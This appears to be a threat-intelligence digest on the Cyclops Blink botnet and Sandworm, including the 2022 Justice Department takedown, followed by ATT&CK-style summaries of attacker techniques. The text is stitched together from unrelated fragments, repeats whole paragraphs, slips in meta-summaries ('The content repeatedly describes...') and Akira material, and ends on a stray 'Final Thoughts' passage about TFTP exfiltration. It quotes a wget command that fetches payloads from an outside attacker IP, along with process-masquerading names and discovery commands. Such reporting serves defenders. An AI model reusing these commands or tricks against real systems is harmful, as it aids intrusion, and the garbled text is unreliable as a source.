Cyclops Blink

Cyclops Blink, originally discovered in late February, was found attacking firewall appliances from WatchGuard Technologies and routers from Asus to attack users.

The Justice Department today announced a court-authorized operation, conducted in March 2022, to disrupt a two-tiered global botnet of thousands of infected network hardware devices under the control of a threat actor known to security researchers as Sandworm.

It also closed the external management ports that Sandworm was using to access those C2 devices, as recommended in WatchGuard’s remediation guidance.

Victims Must Take Additional Steps to Remediate the Vulnerability and Prevent Malicious Actors From Further Exploiting Unpatched Devices.

"Akira examines files prior to encryption ... These checks are performed through native Windows functions such as GetFileAttributesW." Also, "Cyclops Blink can use the Linux API statvfs to enumerate the current working directory."

It also closed the external management ports that Sandworm was using to access those C2 devices, as recommended in WatchGuard’s remediation guidance.

In February, security researchers discovered that Sandworm was the group responsible for creating and operating the Cyclops Blink botnet, a highly persistent malware relying on firmware manipulation.

During the 2016 Ukraine Electric Power Attack, DLLs and EXEs with filenames associated with common electric power sector protocols were used to masquerade files.

RedCurl mimicked legitimate file names and scheduled tasks, e.g. MicrosoftCurrentupdatesCheck and MdMMaintenenceTask to mask malicious files and scheduled tasks.

Akira has used legitimate names and locations for files to evade defenses.

Cyclops Blink can rename its running process to [kworker:0/1] to masquerade as a Linux kernel thread.

J-magic can rename itself as "[nfsiod 0]" to masquerade as the local Network File System (NFS) asynchronous I/O server.

APT28 has performed timestomping on victim files. APT29 has used timestomping to alter the Standard Information timestamps on their web shells to match other files in the same directory. APT32 has used scheduled task raw XML with a backdated timestamp... APT38 has modified data timestamps to mimic files that are in the same folder on a compromised host.

The content repeatedly describes malware and threat actors decoding, decrypting, deobfuscating, or unpacking payloads, strings, configuration data, commands, and C2 responses prior to execution or use.

In February, security researchers discovered that Sandworm was the group responsible for creating and operating the Cyclops Blink botnet, a highly persistent malware relying on firmware manipulation.

The content repeatedly describes malware and threat actors using commands and APIs such as ipconfig /all, ifconfig, arp -a, route print, nbtstat, netsh, GetAdaptersInfo, and GetIpNetTable to gather IP addresses, MAC addresses, DNS, DHCP, gateways, routing tables, ARP cache, proxy settings, domains, and network adapter/interface details.

The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.

The content repeatedly describes malware and threat actors collecting host details such as OS version, hostname, architecture, CPU, memory, BIOS, domain, language, and other configuration data; e.g., "APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information."

The content repeatedly describes malware and threat actors listing files and directories, enumerating drives, searching for files by extension/name/path, retrieving file metadata, and browsing file systems (for example: "APT28 has used Forfiles to locate PDF, Excel, and Word documents during collection" and "cmd can be used to find files and directories with native functionality such as dir commands").

The operation copied and removed malware from vulnerable internet-connected firewall devices that Sandworm used for command and control (C2) of the underlying botnet.

The content repeatedly describes threat actors, malware, and campaigns using HTTP and/or HTTPS for command and control, including examples such as BlackEnergy communicating with C2 over HTTP POST requests and many other families using HTTP/S for C2.

During the 2025 Poland Wiper Attacks, the adversaries utilized Tor nodes for C2. APT28 has routed traffic over Tor and VPN servers to obfuscate their activities. A backdoor used by APT29 created a Tor hidden service to forward traffic from the Tor client to local ports 3389 (RDP), 139 (Netbios), and 445 (SMB) enabling full remote access from outside the network.

Examples include: "APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits," "During C0017, APT41 ran wget http://103.224.80[.]44:8080/kernel to download malicious payloads," and multiple malware families "use HTTP GET requests" or similar to download files/payloads.

The content repeatedly describes malware and threat actors using SSL, TLS, HTTPS, RSA, AES, Blowfish, RC4, ECIES, Diffie-Hellman, OpenSSL, WolfSSL, and mutual TLS to protect command and control traffic.

Examples include: "encrypt C2 messages with AES-256-CBC sent underneath TLS", "encrypts C2 traffic with AES and RSA", "uses SSL/TLS and RC4", and "BlowFish algorithm". | Examples include: "encrypts some C2 with RSA", "RSA encryption for C2 communications", "hard-coded RSA public key", "RSA-2048", "RSA-4096", and "REvil has encrypted C2 communications with the ECIES algorithm". | Multiple malware families and intrusion sets are described as encrypting C2 traffic using SSL/TLS/HTTPS (e.g., "used HTTPS for command and control", "encrypts C2 communications with TLS", "uses SSL for encrypting C2 communications", "TLS-encrypted WebSocket Protocol (WSS) for C2").

Many entries state malware or actors can upload, transfer, send, or exfiltrate files from compromised hosts to command-and-control servers or attacker infrastructure.

Final Thoughts ... Why would an attacker that had achieved RCE on a system exfiltrate an entire configuration file? ... Exfiltration via TFTP is just an odd choice.